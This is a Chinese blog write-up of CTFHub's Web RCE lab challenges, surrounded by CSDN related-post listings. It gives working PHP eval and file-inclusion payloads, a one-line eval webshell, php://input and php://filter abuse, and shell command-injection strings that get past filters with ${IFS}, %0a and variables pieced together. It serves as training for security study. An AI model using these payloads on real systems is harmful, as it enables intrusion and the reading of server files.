CTFHub技能树.Web.RCE

最新推荐文章于 2023-05-19 23:16:23 发布
最新推荐文章于 2023-05-19 23:16:23 发布
阅读量165 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45716477/article/details/116543267
版权

目录

题目

0x01 eval执行

启动环境后可以看到页面上已经给出了源代码。

<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

在php中$_REQUEST可以获取以POST方法和GET方法提交的数据,在这里为了方便就使用GET方法向页面提交payload。
构造url/?cmd=system(" ");可以执行我们想要执行的代码。依次输入url/?cmd=system("ls");url/?cmd=system("ls ../");url/?cmd=system("ls ../../");url/?cmd=system("ls ../../../");可以在../../../目录下找到一个看起来就是目标的东西。
在这里插入图片描述
接着输入url/?cmd=system("cat ../../../flag_31776");即可获得flag。

0x02 文件包含

<?php
error_reporting(0);
if (isset($_GET['file'])) {
    if (!strpos($_GET["file"], "flag")) {
        include $_GET["file"];
    } else {
        echo "Hacker!!!";
    }
} else {
    highlight_file(__FILE__);
}
?>

根据代码,构造url/?file=可以将文件内容包含到页面内。同时题目给了一个shell.txt,其内容为一句话木马。

<?php eval($_REQUEST['ctfhub']);?>

shell.txt文件包含进页面中即可让其中中的php代码被执行。同时,使用hackbarburpsuite向页面传递post请求。
在这里插入图片描述
在这里插入图片描述

0x03 php://input

<?php
if (isset($_GET['file'])) {
    if ( substr($_GET["file"], 0, 6) === "php://" ) {
        include($_GET["file"]);
    } else {
        echo "Hacker!!!";
    }
} else {
    highlight_file(__FILE__);
}
?>

看到构造的url的开头只能为?file=php://,那么可以考虑使用php://input伪协议。

php://input是一个只读信息流,当请求方式是post的,并且enctype不等于”multipart/form-data”时,可以使用php://input来获取原始请求的数据。

php://input伪协议可以执行php代码,因此可以构造包含php代码的post请求包来执行想要执行的命令。
在这里插入图片描述
这题不知道发生了甚么事,不能用hackbar。不能用就不能用吧

0x04 读取源代码

<?php
error_reporting(E_ALL);
if (isset($_GET['file'])) {
    if ( substr($_GET["file"], 0, 6) === "php://" ) {
        include($_GET["file"]);
    } else {
        echo "Hacker!!!";
    }
} else {
    highlight_file(__FILE__);
}
?>

这题用不了php://input,应该是不满足使用的条件。因此可以使用php://input的好兄弟php://filter。同时,题目也给出了flag所在的路径。构造url/?file=php://filter/resource=/flag即可获得flag。

0x05 远程包含

<?php
error_reporting(0);
if (isset($_GET['file'])) {
    if (!strpos($_GET["file"], "flag")) {
        include $_GET["file"];
    } else {
        echo "Hacker!!!";
    }
} else {
    highlight_file(__FILE__);
}
?>

本题的正统方法应该是包含一个网络上的文件来达到和文件包含类似的效果,不过我没有自己的服务器,也没想出来咋通过操作包含进来一个文件。
在这里插入图片描述

尝试将文件包含题目的shell.txt包含进来但是貌似失败了。

不过没关系,这题使用php://input同样可以做出来。

0x06 命令注入

使用管道符即可执行任意我们想要执行的命令。输入1|ls即可查看目录文件。
在这里插入图片描述
随后使用cat命令即可查看文件内容。需要注意的是flag被隐藏在源代码注释中,需要查看源代码才能看到。

0x07 过滤cat

cat被过滤时,可以使用ca\t绕过,也可以使用其他命令代替cat

more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看
file -f:报错出具体内容

0x08 过滤空格

可以使用$IFS${IFS}$IFS$9%09等代替空格。

0x09 过滤目录分隔符

127.0.0.1;cd flag_is_here;ls
127.0.0.1;cd flag_is_here;cat flag_xxx.php

即可找到flag。

0x0A 过滤运算符

过滤了/(\||\&)/,可以使用;进行绕过。
输入1;cat flag_xxx.php即可。

0x0B 综合过滤练习

过滤了/(\||&|;| |\/|cat|flag|ctfhub)/,可以使用变量进行命令拼接。因为过滤的东西太多,这次直接在url里构造。

127.0.0.1%0aa=l%0ab=s%0a$a$b
127.0.0.1%0aa=l%0ab=s%0ac=fl%0ad=ag_is_here%0a$a$b${IFS}$c$d
127.0.0.1%0aa=c%0ab=d%0ac=fl%0ad=ag_is_here%0ae=ca%0af=t%0ag=fl%0ah=ag_xxx.php%0a$a$b${IFS}$c$d%0a$e$f${IFS}$g$h

参考资料

CTF随笔-RCE入门
《从0到1:CTFer成长之路》
《Web安全攻防:渗透测试实战指南》

quantum_(*/ω\*)
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
phpstudy_rce.py
10-11
phpstudy_rce
ctfhub web技能树
mrwangtw的博客
09-03 367
目录 信息泄露 目录遍历 phpinfo 网站源码(当开发人员在线上环境中对源代码进行了备份操作,并且将备份文件放在了 web 目录下,就会引起网站源码泄露。) bak文件(当开发人员在线上环境中对源代码进行了备份操作,并且将备份文件放在了 web 目录下,就会引起网站源码泄露。) vim缓存(当开发人员在线上环境中使用 vim 编辑器,在使用过程中会留下 vim 编辑器缓存,当vim异常退出时,缓存会一直留在服务器上,引起网站源码泄露。) 信息泄露 目录遍历 一个一个点发现在/2...
CTFHub——Web技能树
mcmuyanga的博客
01-23 745
CTFHub Web 网上收集的资料,本地上传,原文链接丢失,只是整理了一下,记录一下做题过程, 信息泄露 目录遍历 用python脚本找一下flag.txt的路径 import requests url = "http://challenge-9360ebe6745e6c45.sandbox.ctfhub.com:10080/flag_in_here/" for i in range(5): for j in range(5): url_test =url+"/"+s
[CTFhub]技能树-Web 信息泄露-phpinfo
菜鸟的博客
05-26 163
启动环境我们得到他们网址 打开网址发现是一个phpinfo页面 然后按快捷键打开ctrl+F 打开网页搜索 由于ctfhub平台的flag是ctfhub开头的 ctfhub{-------------------------------} 所以我们搜索ctfhub{即可找到
CTFHUB 技能树 WEB HTTP请求方式
MrTreebook的博客
05-19 448
CTFHUB HTTP请求方式 WriteUp 解题 CTFHUB HTTP请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 1.创建环境进入网址 2.解决在CMD控制台执行以下命令行 curl -v -X CTFHUB http://challenge-d8eeddbeb7a64576.sandbox.ctfhub.com:10080/index.php 控制台: 3.copy 这段flag即可。 ...
CTFhub平台题解(技能树 彩蛋部分)
weixin_43896279的博客
03-04 3649
CTFhub平台题解(技能树 彩蛋部分) 最近ctfhub平台上线了,平台挺好,让我一顿好肝。作为一个菜鸡想写web的writeup,但我做不出来。 只能拿彩蛋部分过过瘾,彩蛋部分脑洞有的真是挺大的,也有几个题相似,闲话不多说,上手。 首页 脑洞还可以:根据提示说在*.ctfhub.com中,但他这个题目名字有点误导人,千万不要直接跑首页翻。前面说应该是在一个子域名中,但具体是啥不太清楚,上网搜...
ctfhub技能树web
m0_58030673的博客
05-19 917
ctfhub技能树web方向wp
CTFHub技能树 Web-RCE 详解
weixin_45808483的博客
11-13 1918
RCE简介: 初学RCE(远程命令/代码执行漏洞)https://blog.csdn.net/qq_43814486/article/details/90020139 eval执行 启动环境 分析代码,提示我们将命令赋值给cmd执行 我们先查看当前位置的文件,没有什么用 /?cmd=system("ls"); 我们查看根目录文件,发现一个 flag_8999 文件 /?cmd=system("ls /"); 我们先尝试使用cat 命令查看 flag_8999文件 /..
ctfhub技能树web--sql注入
m0_64636395的博客
05-15 644
SQL 注入是一种将 SQL 代码插入或添加到应用(用户)的输入参数中,之后再将这些参数传递给后台的 SQL 服务器加以解析并执行的攻击。攻击者能够修改 SQL 语句,该进程将与执行命令的组件(如数据库服务器、应用服务器或 WEB 服务器)拥有相同的权限。如果 WEB 应用开发人员无法确保在将从 WEB 表单、cookie、输入参数等收到的值传递给 SQL 查询(该查询在数据库服务器上执行)之前已经对其进行过验证,通常就会出现 SQL 注入漏洞。提示:以下是本篇文章正文内容,下面案例可供参考。
题解记录-CTFHub技能树|Web|RCE
weixin_57448435的博客
09-15 763
RCE漏洞,Hackbar插件的使用,cmd命令,运算符、空格、关键字flag、cat。
fanwei_rce.py
10-11
泛微OA管理系统RCE漏洞利用脚本 使用方法 python3 rce.py http://URL
Apache-druid-kafka-rce.yaml
04-30
kafka相关RCE漏洞poc,扫描器的yaml文件,可以导入yara扫描器进行授权漏洞渗透测试。
无参数 rce.md
04-01
记录一下,关于这次比赛的 wp >.< 并向大佬们积极学习 >.< 顺便混点分
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
node-v7.7.2-linux-x86.tar.xz
最新发布
05-08
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
前后端分离的毕业论文(设计)管理系统 (SpringBoot+Vue)
05-08
关于基于SpringBoot和Vue的毕业论文(设计)管理系统,到了一些相关的资源和示例项目,这些资源可能对您的毕业设计有所帮助。 1. **SpringBoot+Vue的三只松鼠商城**: 这个项目是一个基于SpringBoot和Vue的在线购物系统,采用了前后端分离的架构模式。系统实现了管理员模块和用户模块,包括用户管理、地址管理、订单管理、商品管理、支付功能等。这个项目是一个B2C电商平台,使用了MySQL和Redis数据库。 2. **大学生校园社团管理系统**: 这是一个基于SpringBoot和Vue的校园社团管理系统,旨在简化社团报名和组织活动的流程。系统包括用户管理、社团管理、活动信息管理等功能。该项目展示了如何使用前后端分离架构来构建一个校园社团管理系统。 3. **智慧宿舍管理系统**: 这个项目是基于SpringBoot和Vue的智慧宿舍管理系统,旨在提高宿舍管理的效率和便利性。系统包括学生宿舍信息管理、设备监控、安全管理和生活服务等功能。该项目展示了如何使用前后端分离架构来构建一个智能宿舍管理系统。 这些项目可以为您的毕业设计提供灵感和实际的技术指导。您可以
238.html
05-08
238.html
基于tensorflow深度学习的地理位置的命名实体识别.zip
05-08
基于tensorflow深度学习的地理位置的命名实体识别.zip
ctfhub rce
09-01
你想了解关于 CTFHubRCE(远程命令执行)相关内容吗?CTFHub 是一个针对CTF(Capture The Flag)竞赛的学习平台,而RCE是一种常见的漏洞类型之一。在CTFHub上,你可以学习如何发现和利用RCE漏洞来获取系统权限。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值